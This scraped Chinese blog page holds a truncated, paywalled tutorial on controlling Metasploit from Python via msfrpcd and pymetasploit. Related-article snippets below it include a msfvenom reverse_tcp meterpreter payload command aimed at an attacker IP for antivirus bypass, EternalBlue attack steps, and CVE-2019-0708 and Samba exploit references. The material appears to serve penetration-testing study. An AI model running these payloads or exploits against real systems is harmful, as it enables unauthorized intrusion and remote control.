python调用msf_使用python操纵metasploit简单小记

最新推荐文章于 2024-03-18 09:47:30 发布
VIP文章 最新推荐文章于 2024-03-18 09:47:30 发布
阅读量1.8k 收藏 6
点赞数
文章标签: python调用msf

最近想做一款自动化的主机漏洞扫描工具。打算以python作为基础语言,metasploit作为开发基础库。查资料发现国内的论坛博客都只会互相抄来抄去,没一个能打的。

那就我来写一篇。

本文用到的python库是allfro/pymetasploit

使用pip进行安装

pip install pymetasploit

我的开发环境是windows,metasploit跑在kali环境下。所以在kali下面要做如下配置。

首先是运行msfrpcd服务,-S参数表示不通过SSL进行连接,-U后接用户名,-P后接密码。具体可以输入msfrpcd -h查看。

msfrpcd -S -U peng -P peng

运行完后界面是这样的。

然后我们写第一行python程序。引入的方法是这样的:

from metasploit.msfrpc import MsfRpcClient

第二行获得连接的对象,是这样的。

client = MsfRpcClient(password="peng", username="peng", server="192.168.190.128", ssl=False )

解释一下,这个MsfRpcClient传入的参数中,password是必须的,其他可选参数有url/port,可以看源码得知其用途。

我们来打印一下这个对象可调用的方法。此时整体的代码是这样的。

from metasploit.msfrpc import MsfRpcClient

client = MsfRpcClient(password="peng", username="peng", s

最低0.47元/天 解锁文章
weixin_39900468
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
signature=f858aee57ce8e7dd6049cb7a67e88759,jdk8u/jdk8u/jdk: 8d39522b0f75
weixin_34447182的博客
05-30 10万+
--- a/make/CopyFiles.gmkMon Nov 23 15:02:19 2015 -0800+++ b/make/CopyFiles.gmkMon Feb 03 06:25:04 2020 +0000@@ -1,5 +1,5 @@#-# Copyright (c) 2011, 2016, Oracle and/or its affiliates. All rights reserv...
linux shell msfrpc,MsfRpcApi
weixin_31487521的博客
05-13 988
Metasploit API使用文档Metasploit官方提供了API调用方式,有RPCREST两种API调用方式,REST方式只支持专业版使用,这里推荐使用RPC方式调用,即标准API调用使用RPC API调用在通过对Cobalt Strike2.4版本客户端和armitage客户端进行反编译,发现其API调用也为RPC调用。可以认为RPC API调用是"稳定",“可靠”的。RPC API ...
python-libmsf:用于Metasploit Web服务的Python
04-17
python-libmsf 描述 libmsf是用于Metasploit Web服务的python库。 使用libmsf,您可以使用Metasploit对象,例如: libmsf易于使用: >>> from libmsf.msf import Msf >>> from libmsf.rest import MsfRestApi >>> msf_rest_api = MsfRestApi(api_key= ' cf2dbb7f9d1f92839a84f9c165ee9afef3dd3a3116bc99badf45be4ae5655168c9c2c3c58621b460 ' , api_url= ' https://localhost:5443 ' ) >>> workspace: Msf.Workspace = Msf.Workspace(name= ' test_workspace '
Python灰帽编程——错误异常处理和面向对象
weixin_58954236的博客
09-20 226
比如获取用户的输入,写入文件,但是如果在获取数据过程中,发生了异常,就会导致整个脚本结束执行,文件也无法关闭了。需要注意的是,当一个类继承自多个父类时,如果不同父类中存在同名的方法或属性,Python解释器将按照特定的顺序(称为方法解析顺序)来查找和调用。然后,通过创建C类的对象obj,我们可以调用来自父类A和B的方法,也可以调用C类自己的方法method_c。Python 为类元素(属性和方法)的私有性提供初步的形式,由双下划线开始的属性在运行时被“混淆”,所以直接访问是不允许的。
推荐项目:Pymetasploit
最新发布
gitblog_00066的博客
03-18 334
推荐项目:Pymetasploit 项目简介 Pymetasploit 是一个基于 PythonMetasploit 框架的封装库,旨在简化在 Python 中利用 Metasploit 功能的过程。Metasploit 是一个开源的安全漏洞测试工具,它提供了大量的安全漏洞利用模块。通过 Pymetasploit,你可以轻松地在 Python 脚本中调用这些模块,并实现自动化渗透测试。 应用...
Base64编码与图片互转
Steven's Footprint
06-24 652
[code="java"] import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import sun.misc.BASE64Decoder;...
利用metasploit生成反弹shell程序,实现远程控制
qq_33163046的博客
08-20 3740
Metasploit生成反弹shell实现远程控制的方法具有高度定制化、多平台支持、强大的漏洞利用能力、无需事先安装恶意软件以及高度灵活和可扩展等优点。这使得用户能够根据具体需求和目标系统的特点,实现精确、有效和隐蔽的远程控制。
python神器_教你用Python玩转神器Metasploit
weixin_39733146的博客
11-23 391
pymsf是著名安全研究团队Spiderlabs实现的一个PythonMetasploit msgrpc进行通信的python模块,通过它,你可以利用Python玩转渗透测试框架Metasploit使用步骤首先你需要先启动msgrpc服务,命令如下:load msgrpc Pass=与msgrpc进行通信其实就是与msfconsole进行通信,首先你需要创建一个msfrpc的类,登录到msgr...
msf概念、命令,渗透测试流程
agrilly的博客
08-10 939
msf概念、命令,渗透测试流程
python调用msf_从python poc到metasploit模块
weixin_39521651的博客
11-30 730
metasploit5从metasploit开始引入了第三方模块,也就是说可以使用python来编写模块。并且可以加入主分支。得到最新版本由于kail等渗透系统并不是使用github上的最新版本,版本还在4.x。所以我们需要在github上下载git clone https://github.com/rapid7/metasploit-framework/将原来的msf配置文件复制到下载下来的文件...
Python实现远程调用MetaSploit的方法
12-23
本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。具体实现方法如下: (1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。 root@kali:...
Samba_3.x_4.x_Exploit:不使用Metasploit-Framework的Samba 3.x 4.x的利用
02-10
Samba_3.x_4.x_Exploit(SMB“用户名映射脚本”) 利用“ Samba用户名映射脚本命令执行”的Metasploit模块的python版本,我创建了该脚本以避免使用Metasploit,因为它对学习没有用。 :alien_monster:
Generic_Player_3.4.4.1_20080911.rar_CMMB MSF_Generic_Play_cmmb p
09-24
创毅视讯的CMMB Dongle 播放软件,可播放CMMB MFS、MSF格式的流,内附杭州CMMB的码流
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
用Matlab实现基于均值平移(meanshift)算法的灰度图像平滑。有迭代过程,效果比较不错。
MSF渗透测试之msfvenom提权之python
lza20001103的博客
04-05 3384
MSF渗透测试之msfvenom提权之python
python调用msf_MSF利用python反弹shell-Bypass AV
weixin_39883079的博客
11-30 1557
本文主要介绍两种利用msf生成python版 payload,并利用Py2exe或PyInstaller将python文件转为exe文件,可成功bypass某些AV反弹shellmsf-python反弹shell姿势11) msfvenom生成python后门msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.131 LPORT=...
Docker启动msfrpcd服务并使用Python复现CVE-2019-0708
jstang的博客
04-15 4100
本机 目标 192.168.1.100 192.168.1.200 Linux Windows 7 1、docker启动msfrpcd docker run -itd --name msfrpcd -p 55553:55553 -p 4000-4444:4000-4444 jstang/msfrpcd:1.0 2、Python复现CVE-2019-0708 >>> client = MsfRpcClient("123456", server="192.168.1....
永恒之蓝漏洞攻击完整步骤
G_Fu_Q的博客
11-07 8948
kali攻击机 windows2003/windows2008被攻击机 ip:192.168.15.129 1.进行端口扫描 nmap -Pn -sV -T4 ip地址 明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作 2.漏洞脚本检测 nmap --script=vuln 192.168.15.129(ip地址) 看出ms17-010漏洞可以攻击 3.msfconsole测试 msfconsole 4.
【新】Metasploit使用RPC方式复现一个Linux提权漏洞
weixin_42324313的博客
08-29 1983
【新】Metasploit使用RPC方式复现一个Linux提权漏洞 0x00 前言 Metasploit官方提供了API调用方式,有RPC,REST两种方式,REST方式只支持专业版使用,这里推荐使用RPC方式调用,即标准API调用。无论在免费版还是商业版的msf中,都会提供msfrpc服务,以便去远程调用。 开启服务端PRC服务 开启服务端API服务有两种方式: 【1】通过msfconsol...
如何让metasploitPython联动
09-15
6. 使用MetasploitPython库:除了使用Metasploit的模块外,还可以使用MetasploitPython库,即msf-python库,来与Metasploit进行交互。这个库可以让Python脚本直接与Metasploit中的模块进行通信,以执行各种操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值